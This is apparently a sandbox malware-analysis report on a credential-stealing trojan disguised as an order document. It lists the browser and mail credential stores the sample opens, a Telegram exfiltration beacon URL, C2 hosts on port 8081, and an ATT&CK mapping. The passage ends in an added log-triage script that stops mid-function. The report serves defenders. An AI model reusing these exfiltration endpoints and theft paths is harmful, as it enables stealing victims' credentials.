                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -595653s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -595547s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -595433s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -595313s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -595188s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -595063s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594938s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594828s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594719s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594594s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594484s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594374s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594266s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594156s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -594047s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -593937s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -593828s >= -30000s
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<5
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: outlook.office.comVMware20,11696492231s
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: AMC password management pageVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: discord.comVMware20,11696492231f
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: global block list test formVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: dev.azure.comVMware20,11696492231j
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: tasks.office.comVMware20,11696492231o
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Code function: 3_2_05A397B0 LdrInitializeThunk,3_2_05A397B0
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory written: C:\Users\user\Desktop\new order 00041221.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Users\user\Desktop\new order 00041221.exe VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Users\user\Desktop\new order 00041221.exe VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\new order 00041221.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
These paths are the credential stores of Chromium-based browsers (Login Data holds saved passwords, Web Data autofill and payment data, Cookies the session cookies, History and Top Sites browsing data), the profile directory of the Postbox mail client, and the Outlook profile subkey under which account settings and stored mail-server passwords are kept. None of them are touched by a legitimate order document.
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
MITRE ATT&CK matrix, reconstructed from the flattened table as one list per tactic in the matrix's column order. The number after a technique is the badge attached to it in the extracted matrix; those numbered techniques are the cells the report's signatures map to, the unnumbered ones are the empty cells of the matrix template.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (111); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Query Registry (1); Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); System Information Discovery (13); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Email Collection (1); Archive Collected Data (11); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Web Service (1); Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Source | Detection | Scanner | Label
new order 00041221.exe | 41% | Virustotal |
new order 00041221.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeStealer
new order 00041221.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
mail.moonbrosurgical.com | 0% | Virustotal |
reallyfreegeoip.org | 0% | Virustotal |
api.telegram.org | 2% | Virustotal |
checkip.dyndns.com | 0% | Virustotal |
checkip.dyndns.org | 0% | Virustotal |
15.164.165.52.in-addr.arpa | 0% | Virustotal |
Source | Detection | Scanner | Label
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
https://www.office.com/ | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
http://r11.o.lencr.org0# | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
https://www.office.com/lB | 0% | Avira URL Cloud | safe
https://api.telegram.org | 1% | Virustotal |
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a | 0% | Avira URL Cloud | safe
https://www.office.com/ | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
https://chrome.google.com/webstore?hl=en0 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Avira URL Cloud | safe
https://www.office.com/lB | 0% | Virustotal |
https://chrome.google.com/webstore?hl=en | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
http://varders.kozow.com:8081 | 0% | Avira URL Cloud | safe
http://aborters.duckdns.org:8081 | 0% | Avira URL Cloud | safe
http://51.38.247.67:8081/_send_.php?L | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 1% | Virustotal |
https://chrome.google.com/webstore?hl=en | 0% | Virustotal |
http://r11.i.lencr.org/0Q | 0% | Avira URL Cloud | safe
http://aborters.duckdns.org:8081 | 12% | Virustotal |
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Virustotal |
http://51.38.247.67:8081/_send_.php?L | 3% | Virustotal |
https://www.office.com/0 | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a | 1% | Virustotal |
http://anotherarmy.dns.army:8081 | 100% | Avira URL Cloud | malware
https://chrome.google.com/webstore?hl=enlB | 0% | Avira URL Cloud | safe
http://mail.moonbrosurgical.com | 0% | Avira URL Cloud | safe
http://varders.kozow.com:8081 | 15% | Virustotal |
http://r11.i.lencr.org/0Q | 0% | Virustotal |
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | Avira URL Cloud | safe
http://anotherarmy.dns.army:8081 | 15% | Virustotal |
http://mail.moonbrosurgical.com | 0% | Virustotal |
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.moonbrosurgical.com | 203.124.44.4 | true | false | | unknown
reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 193.122.6.168 | true | false | | unknown
15.164.165.52.in-addr.arpa | unknown | unknown | true | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
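The domain and URL tables above give the network side of this sample in one place: a public-IP check (checkip.dyndns.org), a geolocation lookup of that IP (reallyfreegeoip.org/xml/), a Telegram Bot API sendMessage beacon whose text parameter carries the victim's PC name, date/time and country, and fallback hosts on port 8081 (varders.kozow.com, aborters.duckdns.org, anotherarmy.dns.army, 51.38.247.67/_send_.php). The script below is an added example and is not part of the Joe Sandbox report or of the sample: it runs those indicators over proxy-style log lines and decodes the Telegram beacon into its fields. The log format, the log lines and the client addresses are constructed for the example; the hosts, ports and URL shapes are taken from the tables. It generalises slightly beyond the tables by treating any outbound connection to port 8081 as C2 and by correlating per client, so that the recon-then-exfil sequence, rather than a single lookup, is what gets flagged.

```python
"""Flag this sample's network indicators in proxy-style log lines.

Added example for this report, not code from Joe Sandbox or from the sample.
The log format and the log lines are constructed; the hosts and URL shapes
come from the report's domain and URL tables.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Hosts from the report's tables: fallback C2 endpoints on port 8081, the PHP
# upload endpoint and the SMTP host the sample resolves.
C2_HOSTS = {
    "varders.kozow.com",
    "aborters.duckdns.org",
    "anotherarmy.dns.army",
    "51.38.247.67",
    "mail.moonbrosurgical.com",
}
# Pre-exfiltration checks: public IP first, then geolocation of that IP.
RECON_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
C2_PORT = 8081  # assumption: anything on this port is treated as C2

# Constructed proxy log: "<timestamp> <client> <method> <url> <status>".
SAMPLE_LOG = """\
2024-07-27T00:07:10Z 10.0.0.15 GET http://checkip.dyndns.org/ 200
2024-07-27T00:07:10Z 10.0.0.15 GET https://reallyfreegeoip.org/xml/8.46.123.33 200
2024-07-27T00:07:11Z 10.0.0.15 GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States 200
2024-07-27T00:07:30Z 10.0.0.15 POST http://51.38.247.67:8081/_send_.php?L 200
2024-07-27T00:08:00Z 10.0.0.15 GET http://anotherarmy.dns.army:8081/ 000
2024-07-27T00:08:05Z 10.0.0.22 GET https://www.office.com/ 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["host"] = (parts.hostname or "").lower()
    rec["port"] = parts.port or (443 if parts.scheme == "https" else 80)
    rec["path"] = parts.path
    # keep_blank_values so "chat_id=" and the bare "?L" survive as keys
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def decode_telegram_beacon(rec):
    """Decode a Bot API sendMessage beacon of the shape seen in this report.

    The message travels in the 'text' query parameter as percent-encoded,
    CRLF-separated "Key: value" lines (PC Name, Date and Time, Country Name).
    In the captured URL both the bot token and chat_id are empty.
    """
    if rec["host"] != "api.telegram.org" or not rec["path"].endswith("/sendMessage"):
        return None
    token = rec["path"][len("/bot"):-len("/sendMessage")]
    text = rec["query"].get("text", [""])[0]
    fields = {}
    for raw in text.replace("\r\n", "\n").split("\n"):
        if ":" in raw:
            key, value = raw.split(":", 1)
            fields[key.strip()] = value.strip()
    chat_id = rec["query"].get("chat_id", [""])[0]
    return {"bot_token": token, "chat_id": chat_id, "fields": fields}


def triage(log_text):
    """Return (client, category, detail) findings for every matching line."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        beacon = decode_telegram_beacon(rec)
        if rec["host"] in RECON_HOSTS:
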